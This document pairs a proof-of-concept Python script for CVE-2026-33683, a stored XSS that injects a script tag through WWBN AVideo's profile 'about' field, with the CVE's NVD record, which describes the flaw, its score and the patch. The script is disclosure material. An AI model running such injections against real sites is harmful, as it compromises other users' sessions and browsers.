CVE-2026-33683

# Proof of Concept for CVE-2026-33683 # This script demonstrates how to inject a payload into the 'about' field. import requests def exploit(target_url, session_cookie): # The vulnerable endpoint is the user profile update update_url = f"{target_url}/user/profile" # Payload to be injected in the 'about' field # Due to the sanitization flaw, this script tag will be stored and executed payload = '<script>alert("CVE-2026-33683_XSS");</script>' headers = { "Cookie": f"PHPSESSID={session_cookie}" } data = { "about": payload } try: response = requests.post(update_url, headers=headers, data=data) if response.status_code == 200: print("[+] Payload injected successfully.") print(f"[+] Visit the user channel at: {target_url}/channel/attacker_user") else: print(f"[-] Failed to inject payload. Status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") # Example usage # exploit("http://localhost", "valid_session_id")

{"cve": {"id": "CVE-2026-33683", "sourceIdentifier": "[email protected]", "published": "2026-03-23T19:16:41.707", "lastModified": "2026-03-25T18:04:29.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, a sanitization order-of-operations flaw in the user profile \"about\" field allows any registered user to inject arbitrary JavaScript that executes when other users visit their channel page. The `xss_esc()` function entity-encodes input before `strip_specific_tags()` can match dangerous HTML tags, and `html_entity_decode()` on output reverses the encoding, restoring the raw malicious HTML. Commit 7cfdc380dae1e56bbb5de581470d9e9957445df0 contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, una falla en el orden de operaciones de sanitización en el campo 'acerca de' del perfil de usuario permite a cualquier usuario registrado inyectar JavaScript arbitrario que se ejecuta cuando otros usuarios visitan su página de canal. La función `xss_esc()` codifica entidades la entrada antes de que `strip_specific_tags()` pueda coincidir con etiquetas HTML peligrosas, y `html_entity_decode()` en la salida revierte la codificación, restaurando el HTML malicioso en bruto. El commit 7cfdc380dae1e56bbb5de581470d9e9957445df0 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/7cfdc380dae1e56bbb5de581470d9e9957445df0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ghx5-7jjg-q2j7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}